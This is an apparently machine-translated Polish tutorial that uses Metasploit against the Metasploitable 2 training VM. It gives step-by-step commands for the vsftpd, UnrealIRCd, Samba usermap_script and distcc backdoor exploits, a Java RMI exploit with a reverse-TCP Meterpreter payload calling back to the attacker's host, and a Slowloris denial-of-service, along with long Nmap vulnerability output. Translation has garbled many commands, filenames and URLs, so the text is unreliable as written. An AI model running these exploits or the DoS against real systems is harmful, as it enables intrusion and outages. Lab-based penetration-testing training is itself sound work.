10 najlepszych przykładów użycia metasploit

10 najlepszych przykładów użycia metasploit
Metasploit to ramy bezpieczeństwa, które zawierają wiele narzędzi do wykorzystania i testowania systemu. Ten samouczek pokazuje 10 przykładów hakowania ataków na cel Linuksa. Linux Target to środowisko szkoleniowe metasploitable 2 OS, celowo podatne na zagrożenie dla użytkowników, jak nauczyć się wykorzystywać swoje słabości. Ten samouczek koncentruje się tylko na 10 konkretnych atakach metasploit, aby uzyskać informacje na temat Metasploitable 2 Instalacja Przeczytaj więcej tutaj.Aby rozpocząć pobieranie metasploit.

W moim przypadku pobrałem bezpłatny proces Metasploit Pro, ale możesz zdobyć którykolwiek z nich.
Poniższy ekran będzie wymagał niektórych danych osobowych, wypełnij je, aby przejść do strony pobierania:

Pobierz Metasploit dla Linux:

Daj instalatorowi, że właśnie pobrałeś prawa do wykonania, uruchamiając:

# chmod +x metasploit-latest-linux-x64-installer.uruchomić

Następnie wykonaj Metasploit, uruchamiając:

# ./Metasploit-Latest-Linux-X64-installer.uruchomić

Jak widać instalator GUI, kliknij Do przodu kontynuować:

Na następnym ekranie zaakceptuj umowę licencyjną i kliknij Do przodu:

Zostaw domyślny katalog i naciśnij Do przodu:

Zapytany, czy do zainstalowania Metasploit jako usługi Zalecenie nie jest, jeśli to zrobisz, Metasploit Usługa rozpocznie się za każdym razem, gdy naciśniesz, jeśli naciśniesz NIE Usługa Metasploit zostanie uruchomiona tylko na Twoje żądanie. Wybierz swój wybór i naciśnij do przodu, aby kontynuować:

Aby uniknąć zakłóceń, podczas korzystania z metasploit wyłącz zaporę, naciśnij Do przodu kontynuować:

Chyba że pokazany port jest już używany, naciśnij Do przodu kontynuować:

Zostaw LocalHost i naciśnij Do przodu kontynuować:

Następnie kontynuować naciśnięcie instalacji Do przodu po raz ostatni:

Rozpocznie się proces instalacji:

Wreszcie, Metasploit został zainstalowany, pomimo faktu, że nie będziemy pracować z interfejsem internetowym Metasploit. Naciskać Skończyć do końca.

Rozwiązywanie problemów Metasploit DB Błąd:

W moim przypadku, gdy uruchomiłem Metasploit, zwrócił błąd:

 Brak obsługi bazy danych: Nie można połączyć się z serwerem: Odrzucone połączenie to serwer działający na hoście „LocalHost” (:: 1) i akceptujący połączenia TCP/IP na porcie 7337? 

Przyczyną tego błędu jest to, że zależność PostgreSQL nie została również zainstalowana i usługa metasploit.

Aby go rozwiązać, uruchom:

# apt Zainstaluj -y PostgreSQL

Następnie uruchom PostgreSQL, uruchamiając:

# usługa sudo postgresql start

I na koniec rozpocznij usługę Metasploit:

# Sudo Service Metasploit Start

Teraz biegnij msfconsole Znowu zauważysz, że błąd zniknął i jesteśmy gotowi zaatakować metasploitable 2:

Używanie metasploit do zeskanowania celu pod kątem luk:

Pierwszym krokiem jest zeskanowanie naszego celu, aby odkryć na nim usługi i luki. Aby to osiągnąć, użyjemy NMAP z Metasploit i jego NSE (Scripting Scripting Engine) Skrypt vuln używany do wykrywania luk:

# db_nmap -v -script vuln 192.168.0.184

NOTATKA: zastępować 192.168.0.184 Dla docelowego adresu IP lub hosta.

Przeanalizujmy wyjście NMAP:

WAŻNY: Wyjście NMAP zawierało ponad 4000 linii, dlatego wyjście zostało skrócone, pozostawiając odpowiednie informacje do wyjaśnienia.

Poniższe linie pokazują nam zainicjowane rodzaje skanów, które obejmują NSE, ARP Ping Scan, rozdzielczość DNS i skanowanie Syn Stealth. Wszystkie te kroki zostały już wyraźnie wyjaśnione na Linuxhint.com w skanowaniu ARP NPING i NMAP, używa.

Należy zauważyć, że NSE zawiera wstępne wykonywanie, podczas skanowania i skanowania po wydłużeniu, które działają przed, w trakcie i po rozpoczęciu i końce skanowania.

 MSF5> db_nmap -v -Script vuln 192.168.0.184 [*] NMAP: Uruchamianie NMAP 7.70 (https: // nmap.org) na 2020-02-04 16:56 -03 [*] nmap: NSE: załadowane 103 skanowanie do skanowania. [*] NMAP: NSE: Skrypt wstępny. [*] Nmap: inicjowanie NSE o 16:56 [*] nmap: ukończony NSE o 16:57, 10.00S upłynął [*] nmap: inicjowanie NSE o 16:57 [*] nmap: ukończony NSE o 16:57, 0.00s upłynął [*] nmap: inicjowanie skanowania ping ARP o 16:57 [*] nmap: skanowanie 192.168.0.184 [1 port] [*] NMAP: zakończony skan ARP Ping o 16:57, 0.05S upłynęło (1 ogółem hostów) [*] NMAP: inicjowanie równoległych rozdzielczości DNS 1 hosta. o 16:57 [*] nmap: zakończona równoległa rozdzielczość DNS 1 hosta. o 16:57, 0.02S upłynął [*] NMAP: inicjowanie Syn Stealth Scan o 16:57 [*] NMAP: Skanowanie 192.168.0.184 [1000 portów] 

Następny ekstrakt pokazuje, jakie usługi są dostępne w naszym celu:

 [*] NMAP: Odkryty otwarty port 25/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 80/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 445/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 139/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 3306/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 5900/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 22/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 53/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 111/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 21/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 23/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 1099/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 512/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 1524/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 513/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 514/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 2121/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 6000/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 2049/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 6667/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 8009/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 5432/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 8180/TCP na 192.168.0.184 [*] NMAP: zakończony Syn Stealth Scan o 16:57, 0.Wyjdźli 12s (1000 portów) 

Poniższy raport z wyciągu NSE Post Scan Scripts Wykonanie w celu znalezienia luk w zabezpieczeniach:

 [*] NMAP: NSE: Script Scanning 192.168.0.184. [*] Nmap: inicjowanie NSE o 16:57 [*] nmap: ukończony NSE o 17:02, 322.44S upłynął [*] nmap: inicjowanie NSE o 17:02 [*] nmap: ukończony nse o 17:02, 0.74S upłynął [*] NMAP: raport skanowania NMAP za 192.168.0.184 [*] nmap: host jest w górę (0.Opóźnienie 00075s). [*] Nmap: nie pokazano: 977 zamknięte porty 

Jak widać, NMAP znalazł już dziury bezpieczeństwa lub luki w docelowej usłudze FTP, nawet łączy nas exploits, aby zhakować cel:

 [*] NMAP: Port State Service [*] nmap: 21/tcp Otwórz ftp [*] nmap: | FTP-VSFTPD-BACKDOOR: [*] NMAP: | Podatne: [*] nmap: | VSFTPD wersja 2.3.4 Backdoor [*] nmap: | Stan: wrażliwy (exploable) [*] nmap: | IDS: OSVDB: 73573 CVE: CVE-2011-2523 [*] NMAP: | VSFTPD wersja 2.3.4 Backdoor, zostało to zgłoszone w 2011-07-04. [*] Nmap: | Data ujawnienia: 2011-07-03 [*] NMAP: | Wykorzystanie wyników: [*] nmap: | Polecenie powłoki: id [*] nmap: | Wyniki: uid = 0 (root) gid = 0 (root) [*] nmap: | Odniesienia: [*] nmap: | http: // ScarybeastSecurity.Blogspot.com/2011/07/alert-vsftpd-download-bardooded.html [*] nmap: | http: // osvdb.org/73573 [*] nmap: | https: // github.com/Rapid7/metasploit-framework/blob/master/module/exploits/unix/ftp/vsftpd_234_backdoor.rb [*] nmap: | _ https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2011-2523 

Below you can see, additionally to FTP security holes, Nmap detected SSL vulnerabilities:

[*] Nmap: | _sslv2-Drown: [*] nmap: 22/tcp Open ssh [*] nmap: 23/tcp Open Telnet [*] nmap: 25/tcp Open SMTP [*] nmap: | SMTP-VULN-CVE2010-4344: [*] NMAP: | _ Serwer SMTP nie jest exim: nie wrażliwy [*] nmap: | SSL-DH-PARAMS: [*] NMAP: | Podatne: [*] nmap: | Anonimowa Diffie-Hellman Exchange MITM podatność [*] NMAP: | Stan: wrażliwy [*] nmap: | Usługi bezpieczeństwa warstwy transportowej (TLS), które używają anonimowego [*] nmap: | Diffie-Hellman Exchange zapewnia jedynie ochronę przed pasywnym [*] nmap: | podsłuch i są podatni na aktywne ataki man-in-the-middle [*] nmap: | co może całkowicie zagrozić poufności i integralności [*] nmap: | wszelkich danych wymienionych w wyniku uzyskanej sesji. [*] Nmap: | Sprawdź wyniki: [*] NMAP: | Anonimowa grupa DH 1 [*] NMAP: | Cipher Suite: tls_dh_anon_with_aes_256_cbc_sha [*] nmap: | Moduł typ: bezpieczny prime [*] nmap: | Źródło modułu: postfix wbudowany [*] nmap: | Długość modułu: 1024 [*] nmap: | Długość generatora: 8 [*] nmap: | Długość klucza publicznego: 1024 [*] NMAP: | Odniesienia: [*] nmap: | https: // www.IETF.ORG/RFC/RFC2246.txt [*] nmap: | [*] Nmap: | Protokół bezpieczeństwa warstwy transportowej (TLS) DHE_EXPORT szyfrów obniżka MITM (logjam) [*] nmap: | Stan: wrażliwy [*] nmap: | IDS: OSVDB: 122331 CVE: CVE-2015-4000 [*] NMAP: | Protokół bezpieczeństwa warstwy transportowej (TLS) zawiera wadę, jaką jest [*] nmap: | wyzwalane podczas obsługi giełd kluczy Diffie-Hellman zdefiniowanych za pomocą [*] nmap: | szyfr dhe_export. Może to pozwolić na atakującego Man-in-the-Middle [*] nmap: | Aby obniżyć bezpieczeństwo sesji TLS do 512-bitowej eksportu [*] NMAP: | Kryptografia, która jest znacznie słabsza, umożliwiając atakującemu [*] nmap: | Aby łatwiej złamać szyfrowanie i monitorować lub manipulować [*] nmap: | Szyfrowany strumień. [*] Nmap: | Data ujawnienia: 2015-5-19 [*] NMAP: | Sprawdź wyniki: [*] NMAP: | Eksportowa grupa DH 1 [*] NMAP: | Cipher Suite: tls_dhe_rsa_export_with_des40_cbc_sha [*] nmap: | Moduł typ: bezpieczny prime [*] nmap: | Źródło modułu: nieznany/generowany na zamówienie [*] nmap: | Długość modułu: 512 [*] nmap: | Długość generatora: 8 [*] nmap: | Długość klucza publicznego: 512 [*] NMAP: | Odniesienia: [*] nmap: | https: // słabe.org [*] nmap: | http: // osvdb.ORG/122331 [*] NMAP: | https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2015-4000 [*] NMAP: | [*] Nmap: | Diffie-Hellman Exchange Exchange Insvysterpl Group Siły [*] NMAP: | Stan: wrażliwy [*] nmap: | Usługi bezpieczeństwa warstwy transportowej (TLS), które korzystają z grup Diffie-Hellman [*] NMAP: | niewystarczającej siły, zwłaszcza tych, którzy używają jednego z kilku powszechnie [*] nmap: | Grupy wspólne, mogą być podatne na pasywne ataki podsłuchujące. [*] Nmap: | Sprawdź wyniki: [*] NMAP: | Słaba grupa DH 1 [*] nmap: | Cipher Suite: tls_dhe_rsa_with_des_cbc_sha [*] nmap: | Moduł typ: bezpieczny prime [*] nmap: | Źródło modułu: postfix wbudowany [*] nmap: | Długość modułu: 1024 [*] nmap: | Długość generatora: 8 [*] nmap: | Długość klucza publicznego: 1024 [*] NMAP: | Odniesienia: [*] nmap: | _ https: // słabe.org [*] nmap: | SSL-Poodle: [*] nmap: | Podatne: [*] nmap: | SSL Pudle Information wyciek [*] NMAP: | Stan: wrażliwy [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Protokół SSL 3.0, stosowane w Openssl do 1.0.1i i inne [*] nmap: | Produkty, używa niedeterministycznego wyściółki CBC, co ułatwia [*] NMAP: | dla atakujących man-in-the-middle, aby uzyskać dane o cleartext za pośrednictwem [*] nmap: | Atak wyściółki, czyli problem „pudla”. [*] Nmap: | Data ujawnienia: 2014-10-14 [*] NMAP: | Sprawdź wyniki: [*] NMAP: | Tls_rsa_with_aes_128_cbc_sha [*] nmap: | Odniesienia: [*] nmap: | https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2014-3566 [*] nmap: | https: // www.Openssl.org/~ bodo/ssl-poodle.pdf [*] nmap: | https: // www.Imperialviolet.org/2014/10/14/pudle.html [*] nmap: | _ http: // osvdb.ORG/113251 [*] NMAP: | SSLV2-Drown: [*] nmap: | szyfry: [*] nmap: | SSL2_RC4_128_EXPORT40_WITH_MD5 [*] NMAP: | SSL2_DES_192_EDE3_CBC_WITH_MD5 [*] NMAP: | SSL2_RC2_128_CBC_WITH_MD5 [*] NMAP: | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 [*] NMAP: | SSL2_RC4_128_WITH_MD5 [*] NMAP: | SSL2_DES_64_CBC_WITH_MD5 [*] NMAP: | vulns: [*] nmap: | CVE-2016-0703: [*] nmap: | Tytuł: OpenSSL: Odzyskiwanie klucza sesji Divide and Conquer w SSLV2 [*] NMAP: | Stan: wrażliwy [*] nmap: | IDS: [*] nmap: | CVE: CVE-2016-0703 [*] NMAP: | Opis: [*] NMAP: | Funkcja get_client_master_key w s2_srvr.c Wdrożenie SSLV2 w [*] nmap: | OpenSsl przed 0.9.8zf, 1.0.0 przed 1.0.0r, 1.0.1 przed 1.0.1M i 1.0.2 Przed [*] nmap: | 1.0.2A przyjmuje niezerową wartość czystej klawiszu klienta dla dowolnej [*] NMAP: | szyfr, który umożliwia atakującym man-in-the-middle na określenie wartości mistrzowskiej [*] nmap: | i odszyfrować dane szyfrowania tls poprzez wykorzystanie wyściółki Bleichenbacher RSA, a [*] nmap: | Powiązany problem z CVE-2016-0800. [*] Nmap: | [*] Nmap: | Refs: [*] nmap: | https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2016-0703 [*] nmap: | https: // www.Openssl.org/news/secadv/20160301.tekst 

Poniższy ekstrakt pokazuje, że w serwisie internetowym znaleziono wiele luk w zabezpieczeniach, w tym dostęp do rozsądnych stron logowania i odmowa podatności na usługi.

 [*] NMAP: 53/TCP Open Domena [*] nmap: 80/tcp Otwórz http [*] nmap: | http-csrf: [*] nmap: | Pająk ograniczony do: maxdepth = 3; maxpagecount = 20; wewnątrz Host = 192.168.0.184 [*] nmap: | Znalazłem następujące możliwe luki CSRF: [*] NMAP: | [*] Nmap: | Ścieżka: http: // 192.168.0.184: 80/ dvwa/ [*] nmap: | Identyfikator formularza: [*] nmap: | Forma Działanie: Zaloguj się.php [*] nmap: | [*] Nmap: | Ścieżka: http: // 192.168.0.184: 80/DVWA/Login.php [*] nmap: | Identyfikator formularza: [*] nmap: | _ Forma Działanie: Zaloguj się.php [*] nmap: | _http-dombased-xss: nie można znaleźć żadnego XSS opartych na DOM. [*] Nmap: | http-enum: [*] nmap: | /tikiwiki/: tikiwiki [*] nmap: | /test/: Strona testowa [*] nmap: | /phpinfo.PHP: możliwy plik informacji [*] nmap: | /phpMyAdmin/: phpMyAdmin [*] nmap: | /Doc/: potencjalnie interesujący katalog z listą „Apache/2.2.8 (Ubuntu) Dav/2 '[*] nmap: | /ikony/: potencjalnie interesujący folder z listą katalogu [*] nmap: | _/index/: potencjalnie interesujący folder [*] nmap: | Http-Slowloris-CHECK: [*] nmap: | Podatne: [*] nmap: | Atak Slowloris dos [*] nmap: | Stan: Prawdopodobnie wrażliwy [*] nmap: | IDS: CVE: CVE-2007-6750 [*] NMAP: | Slowloris próbuje zachować wiele połączeń z docelowym serwerem WWW otwartym i trzymaj [*] nmap: | otwierają się tak długo, jak to możliwe. Osiąga to, otwierając połączenia z [*] nmap: | docelowy serwer WWW i wysyłanie częściowego żądania. W ten sposób głoduje [*] nmap: | zasoby serwera HTTP powodujące zaprzeczenie usługi. [*] Nmap: | [*] Nmap: | Data ujawnienia: 2009-09-17 [*] NMAP: | Odniesienia: [*] nmap: | http: // ha.Ckers.org/slowloris/[*] nmap: | _ https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2007-6750 

Na tym etapie NMAP znalazł wiele luk wtrysku SQL, ilość luk w zabezpieczeniach była tak duża w tym samouczku, że usunęłem wiele z nich i zostawiłem:

 [*] Nmap: | HTTP-SQL Indeption: [*] nmap: | Możliwe SQLI dla zapytań: [*] nmap: | http: // 192.168.0.184: 80/Dav/?C = n%3BO%3DD%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = S%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = M%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = D%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = Test-Test-naok-hookup.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = dokumentacja%2Fvulneriless.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = Capture-Data.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = tekst-plik-viewer.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/MUTILLIDAE/?Strona = dodanie do-your-blogu.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/MUTILLIDAE/?strona = show-log.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = rejestracja.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = HTML5-STORAGE.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = użytkownik-info.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = dom.php & do = przełączniki%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = show-log.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = notatki.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = kadrowanie.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = błąd php.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = dom.php i do = przełączanie bezpieczeństwa%27%20%%20SQLSPIDER 

Poniżej NMAP ponownie odrzuca luki XSS (jak w pierwszym ekstrakcie) i raporty

Remote Metoda Invocation (RMI) Otwory bezpieczeństwa Zgoda z niewłaściwą konfiguracją umożliwiającą atakującemu umożliwienie złośliwego wykonywania kodu Java:

 [*] Nmap: | _http-przechadza się-XSS: Nie można znaleźć żadnych zapisanych luk XSS. [*] Nmap: | _http-trace: śledzenie jest włączone [*] nmap: | _http-vuln-cve2017-1001000: błąd: wykonywanie skryptu nie powiodło się (użyj -d do debugowania) [*] nmap: 111/tcp Open RPCBind [ *] NMAP: 139/TCP Open Netbios-SSN [*] NMAP: 445/TCP Otwórz Microsoft-DD [*] NMAP: 512/TCP Open Exec [*] NMAP: 513/TCP Open Login [*] NMAP: 514/// TCP Open Shell [*] nmap: 1099/tcp Open rmiregistry [*] nmap: | RMI-vuln-Classloader: [*] nmap: | Podatne: [*] nmap: | Domyślna konfiguracja rejestru RMI Wykonanie kodu zdalnego wykonywania podatności [*] NMAP: | Stan: wrażliwy [*] nmap: | Domyślna konfiguracja rejestru RMI umożliwia ładowanie klas z zdalnych adresów URL, które mogą prowadzić do wykonania zdalnego kodu. [*] Nmap: | [*] Nmap: | Odniesienia: [*] nmap: | _ https: // github.com/Rapid7/metasploit-framework/blob/master/modules/exploits/multi/misp/java_rmi_server.RB 

Poniżej można zobaczyć dodatkowe podatności SSL:

 [*] Nmap: | SSL-CCS Indection: [*] nmap: | Podatne: [*] nmap: | SSL/TLS MITM podatność na podatność (CCS Inciction) [*] NMAP: | Stan: wrażliwy [*] nmap: | Współczynnik ryzyka: Wysoki [*] NMAP: | OpenSsl przed 0.9.8za, 1.0.0 przed 1.0.0m i 1.0.1 przed 1.0.1H [*] nmap: | nie ogranicza właściwie przetwarzania komunikatów ChangeCerSpec, [*] nmap: | który pozwala napastnikom man-wściekli na wyzwolenie używania zero [*] nmap: | Klucz główny długości w niektórych komunikacjach Openssl-Oopenssl i [*] nmap: | W konsekwencji porywa sesje lub uzyskaj poufne informacje, za pośrednictwem [*] nmap: | Wykonany uścisk dłoni TLS, czyli podatność „CCS Incection”. [*] Nmap: | [*] Nmap: | Odniesienia: [*] nmap: | https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2014-0224 [*] nmap: | http: // www.CVEDETAILS.com/cve/2014-0224 [*] nmap: | _ http: // www.Openssl.org/news/secadv_20140605.txt [*] nmap: | SSL-DH-PARAMS: [*] NMAP: | Podatne: [*] nmap: | Diffie-Hellman Exchange Exchange Insvysterpl Group Siły [*] NMAP: | Stan: wrażliwy [*] nmap: | Usługi bezpieczeństwa warstwy transportowej (TLS), które korzystają z grup Diffie-Hellman [*] NMAP: | niewystarczającej siły, zwłaszcza tych, którzy używają jednego z kilku powszechnie [*] nmap: | Grupy wspólne, mogą być podatne na pasywne ataki podsłuchujące. [*] Nmap: | Sprawdź wyniki: [*] NMAP: | Słaba grupa DH 1 [*] nmap: | Cipher Suite: tls_dhe_rsa_with_aes_128_cbc_sha [*] nmap: | Moduł typ: bezpieczny prime [*] nmap: | Źródło modułu: nieznany/generowany na zamówienie [*] nmap: | Długość modułu: 1024 [*] nmap: | Długość generatora: 8 [*] nmap: | Długość klucza publicznego: 1024 [*] NMAP: | Odniesienia: [*] nmap: | _ https: // słabe.org [*] nmap: | SSL-Poodle: [*] nmap: | Podatne: [*] nmap: | SSL Pudle Information wyciek [*] NMAP: | Stan: wrażliwy [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Protokół SSL 3.0, stosowane w Openssl do 1.0.1i i inne 

Następny ekstrakt pokazuje, że nasz cel jest prawdopodobnie zarażony trojanem przeciwko usłudze IRC:

 [*] Nmap: | _IRC-UNREALIRCD-BACKDOOR: Wygląda jak trojanowana wersja Unrealircd. Zobacz http: // seklist.Org/FullDisCotuar/2010/Jun/277 [*] NMAP: 8009/TCP Open AJP13 

Poniższy ekstrakt pokazuje, że flaga httponly nie jest odpowiednio skonfigurowana, dlatego cel jest podatny na ataki skryptów między witryną:

 [*] NMAP: 8180/TCP Otwórz nieznany [*] nmap: | http-Cookie-Flags: [*] nmap: | /admin/: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/indeks.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/login.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/admin.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/konto.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/admin_login.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/dom.HTML: 

Poniższy wyciąg wymieni lub wymienia interesujące znaleziono dostępne katalogi w naszym celu:

 [*] Nmap: | http-enum: [*] nmap: | /admin/: możliwy folder administratora [*] nmap: | /admin/indeks.html: możliwy folder administratora [*] nmap: | /admin/login.html: możliwy folder administratora [*] nmap: | /admin/admin.html: możliwy folder administratora [*] nmap: | /admin/konto.html: możliwy folder administratora [*] nmap: | /admin/admin_login.html: możliwy folder administratora [*] nmap: | /admin/dom.html: możliwy folder administratora [*] nmap: | /admin/admin-login.html: możliwy folder administratora [*] nmap: | /admin/adminlogin.html: możliwy folder administratora [*] nmap: | /admin/controlpanel.html: możliwy folder administratora [*] nmap: | /admin/cp.html: możliwy folder administratora [*] nmap: | /admin/indeks.JSP: możliwy folder administratora 

Wreszcie, skan kończy się i wykonuje się NSE po skanowaniu:

 [*] Nmap: | [*] Nmap: | Data ujawnienia: 2009-09-17 [*] NMAP: | Odniesienia: [*] nmap: | http: // ha.Ckers.org/slowloris/[*] nmap: | _ https: // cve.mitra.org/cgi-bin/cVename.CGI?name = CVE-2007-6750 [*] nmap: MAC -MS10-054: false [*] nmap: | _smb-vuln-ms10-061: false [*] nmap: nse: Script Post-Scanning. [*] Nmap: inicjowanie NSE o 17:02 [*] nmap: ukończony nse o 17:02, 0.00S upłynął [*] nmap: inicjowanie NSE o 17:02 [*] nmap: ukończony nse o 17:02, 0.00S, które minęły [*] NMAP: Odczyt pliki danych z:/opt/metasploit/common/share/nmap/[*] nmap: NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 333.96 sekund [*] NMAP: Surowe pakiety Wysłane: 1001 (44.028KB) | RCVD: 1001 (40.120KB) MSF5> 

Teraz zidentyfikowaliśmy niektóre dziury bezpieczeństwa, aby zaatakować nasz cel.

Korzystanie z Metasploit do zhakowania serwera FTP:

Po zidentyfikowaniu otworów bezpieczeństwa w celu użycie poleceń Metasploit, aby znaleźć odpowiednie wykorzystywanie przeciwko nim. Jak wcześniej widziałeś, jeden z pierwszych znalezionej luki znajdował się na serwerze VSFTPD, aby znaleźć odpowiednie exploits, w Metasploit Run:

# Wyszukaj VSFTPD

Jak widzisz Metasploit zawiera backdoor, który może pomóc nam zhakować naszą docelową FTP. Aby użyć tego exploit, w Metasploit Run:

# Użyj exploit/unix/ftp/vsftpd_234_backdoor

Aby nauczyć się korzystać z dowolnego konkretnego uruchomienia exploit:

# Pokaż opcje

Jak widać powyżej, ten exploit zawiera 2 opcje, Rhosts (zdalny host) i RPOR. Musimy określić Rhost, port jest już określony (21).
Aby ustawić zdalny host (RHOST) definiujący docelowy bieg IP:

# Ustaw Rhost 192.168.0.184

Po zdefiniowaniu celu uruchom następujące polecenie, aby wykorzystać dziurę bezpieczeństwa:

# Exploit

Jak widać, dostałem skorupę do celu, kiedy uruchamiam „LS”, widzę pliki docelowe, atak się powiódł. Aby pozostawić cel, po prostu uruchom:

#Wyjście

Używanie metasploit do ataku DOS:

Jak widziałeś podczas procesu skanowania, znaleziono podatność na Dos Slowloris, aby znaleźć sposób, w jaki ją wykorzystać, wykonaj poprzednie kroki, aby wyszukać odpowiednie narzędzie, w tym przypadku moduł pomocniczy zamiast exploita:

# Wyszukaj slowloris

Po znalezieniu narzędzia do ataku, uruchom:

# Użyj pomocniczy/DOS/http/slowloris
# Ustaw Rhost 192.168.0.184

Wtedy po prostu wpisz:

# uruchomić

Zauważysz, że podczas działania ataku docelowa usługa HTTP nie będzie dostępna, ładuje się:

Kiedy zatrzymamy atak, naciskając KLAWISZ KONTROLNY+C Serwer będzie dostępny ponownie:

Korzystanie z Metasploit do zhakowania serwera IRC:

Internetowa czat przekaźnikowy jest szeroko stosowany na całym świecie, jak można było zauważyć na pierwszych etapach skanowania metasploit, który prawdopodobnie znalazł usługę IRC (Unreal IRCD) zarażoną trojanem.

Powtórzmy kroki, aby znaleźć narzędzie do zhakowania:

# Wyszukaj Unreal IRCD
# Użyj exploit/unix/irc/unreal_ircd_3281_backdoor
# Pokaż opcje
# Ustaw Rhost 192.168.0.184

Następnie uruchomić:

# Exploit

I jak widać ponownie, mamy sesję powłoki w celu.

Korzystanie z Metasploit do wykonania złośliwego kodu Java:

# Użyj exploit/multi/misc/java_rmi_server
# Pokaż opcje
# Ustaw Rhost 192.168.0.184
# Pokaż ładunki
# Ustaw obciążenie java/miernik/reverse_tcp
# Set lhost 192.168.0.50
# Exploit

Używanie metasploit do zhakowania przez podatność skryptu samba Usermap:

Niektóre kroki, takie jak wyszukiwanie exploitów, zostaną pominięte, aby uniknąć wielkiego samouczka. Aby wykorzystać tę podatność na podatność:

# Użyj exploit/multi/samba/usermap_script
# Pokaż opcje

Ustaw docelowy adres IP i wykorzystaj go, uruchamiając:

# Ustaw Rhost 192.168.0.184
# Exploit

Jak widać, zdobyliśmy skorupę w naszym celu.

Używanie Metasploit do wykorzystania wykonania polecenia Distcc Daemon:

Ta podatność jest tutaj wyjaśniona.

Aby rozpocząć bieg:

# Użyj exploit/unix/misc/distcc_exec

Następnie uruchomić:

# Ustaw Rhost 192.168.0.184
# Exploit

Jak widać, ponownie uzyskaliśmy dostęp do celu.

Korzystanie z metasploit do skanowania portów (dodatkowy sposób bez NMAP):

Przeprowadzanie skanowania TCP z Metasploit:

Aby uruchomić inny skan bez użycia NMAP Metasploit, oferuje alternatywy, które można znaleźć, uruchamiając:

# Wyszukaj portscan

Aby wykonać skanowanie TCP:

# Użyj skanera/portscan/tcp
# Ustaw Rhost 192.168.0.184

Aby zobaczyć dodatkowe opcje:

# Pokaż opcje

Wybierz zakres portów, który chcesz zeskanować, uruchamiając:

# Ustaw porty 21-35

Następnie uruchom skan, wykonując:

# uruchomić

Jak widać porty 22, 25,23 i 21, znaleziono otwarte.

Przeprowadzanie skanowania SYN z Metasploit:

W przypadku skanowania SYN:

# Użyj pomocniczego/skanera/portscan/syn
# Ustaw Rhost 192.168.0.184
# Ustaw porty 80
# uruchomić

Jak widać, port 80 został otwarty.

WNIOSEK

